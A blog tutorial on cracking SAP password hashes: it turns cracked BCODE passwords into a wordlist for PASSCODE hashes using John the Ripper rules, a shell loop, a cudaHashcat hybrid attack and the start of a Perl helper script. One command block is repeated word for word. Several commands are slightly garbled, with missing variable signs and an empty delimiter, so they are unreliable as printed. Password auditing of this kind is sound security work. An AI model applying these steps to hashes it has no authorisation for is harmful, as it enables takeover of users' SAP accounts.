Article

Cracking SAP password – cracking passcode

16-01-2015

From BCODE to PASSCODE

Once we have found a sufficient amount of passwords, using both John the Ripper and oclHashcat, we can proceed cracking the passcode. This is the “real” password used by a user to log on the SAP system.

# cat found_sap_qla_bcode.txt >> sap_qla_bcode.pot
# vi sap_qla_bcode.pot
:%s/^.\{-}://g
:sort u
:w sap_qla_bcode.wrd
:q!

# john --pot=sap_qla_passcode.pot --session=sap_qla_passcode --format=sapg --encoding=utf8 -w=sap_qla_bcode.wrd sap_qla_passcode.hash
# john --pot=sap_qla_passcode.pot --session=sap_qla_passcode --format=sapg --encoding=utf8 -w=sap_qla_bcode.wrd --rules sap_qla_passcode.hash
# john --pot=sap_qla_passcode.pot --session=sap_qla_passcode --format=sapg --encoding=utf8 -w=sap_qla_bcode.wrd --rules=single-extra sap_qla_passcode.hash

We consider the passwords already cracked with john and oclHashcat in the BCODE format and we are going to reuse them in order to create a wordlist that we will name sap_qla_bcode.wrd, we then launch john again with the first rules using the hash file in the sapg format.

If, after these steps, there are still password in the pot of the BCODE and these same passwords are not in the pot of the PASSCODE, we can create a custom rule to complete the conversion process:

# john --pot=sap_qla_passcode.pot --session=sap_qla_passcode --format=sapg --encoding=utf8 -w=sap_qla_bcode.wrd --rules=Bcode2Passcode sap_qla_passcode.hash

Every password that still does not match this criteria is longer than 8 characters and we then need to proceed with other rules, anyway only in append mode!

We are going to extract from the sap_qla_bcode.pot file every password that doesn’t exist in the sap_bla_passcode.pot file, then we are going to apply the “Bcode2Passcode” john rule and we append a character each time until we find the complete password.

# cat sap_qla_bcode.pot | cut -d -f1 > bcode_found.txt
# cat sap_qla_passcode.pot | cut -d -f1 > passcode_found.txt
# mkdir notcracked
# for i in ( grep -Fx -f passcode_found.txt -v bcode_found.txt )
do
grep "^{i}[$]" sap_qla_bcode.pot | sed -e 's/^.*[^:]://g' | john --pipe --rules=Bcode2Passcode --stdout > notcracked/{i}.wrd
grep "^{i}:" sap_qla_passcode.hash | sed -e 's/:.*g' > notcracked/{i}.oclhash
done
# for i in ( ls notcracked/*.oclhash ) 
do
cudaHashcat64.bin --session=sap_qla_passcode -o found_sap_qla_passcode.txt -a 6 -m 7800 --remove {i} {i/.oclhash/.wrd} ?a?a
done

# cat sap_qla_bcode.pot | cut -d -f1 > bcode_found.txt
# cat sap_qla_passcode.pot | cut -d -f1 > passcode_found.txt
# mkdir notcracked
# for i in ( grep -Fx -f passcode_found.txt -v bcode_found.txt )
do
grep "^{i}[$]" sap_qla_bcode.pot | sed -e 's/^.*[^:]://g' | john --pipe --rules=Bcode2Passcode --stdout > notcracked/{i}.wrd
grep "^{i}:" sap_qla_passcode.hash | sed -e 's/:.*g' > notcracked/{i}.oclhash
done
# for i in ( ls notcracked/*.oclhash ) 
do

cudaHashcat64.bin --session=sap_qla_passcode -o found_sap_qla_passcode.txt -a 6 -m 7800 --remove {i} {i/.oclhash/.wrd} ?a?a
done

This way we combined john rules to create a very complete wordlist with the power of the oclHashcat hybrid attack. Using the last command we are guaranteed to discover all passwords long less than or equal to 10 characters.

By having a wordlist with the first 8 characters and a wordlist created ad-hoc for every user with all the possible combinations of those characters, we can guess the complete password, thus we can keep using john or we can use oclHashcat mask with the “Hybrid” attack.

To complete the cracking process and to extract the correct password of the right SAP client we can use this script (after gathering every password cracked by oclHashcat in the same pot):

#!/usr/bin/perl -w
# sappwdfound.pl

use strict;
use warnings;

if (#ARGV != 1) {
die ("Usage: sappwdfound.pl hashfile potfile \
hashfile format: USER:CLIENT:BCODE:PASSCODE \
potfile format: USER\HASH:PASSWORD\n");
}

open (HASH, $ARGV[0]) || die ("Unable to open hashfile\n");

L'hai trovato interessante?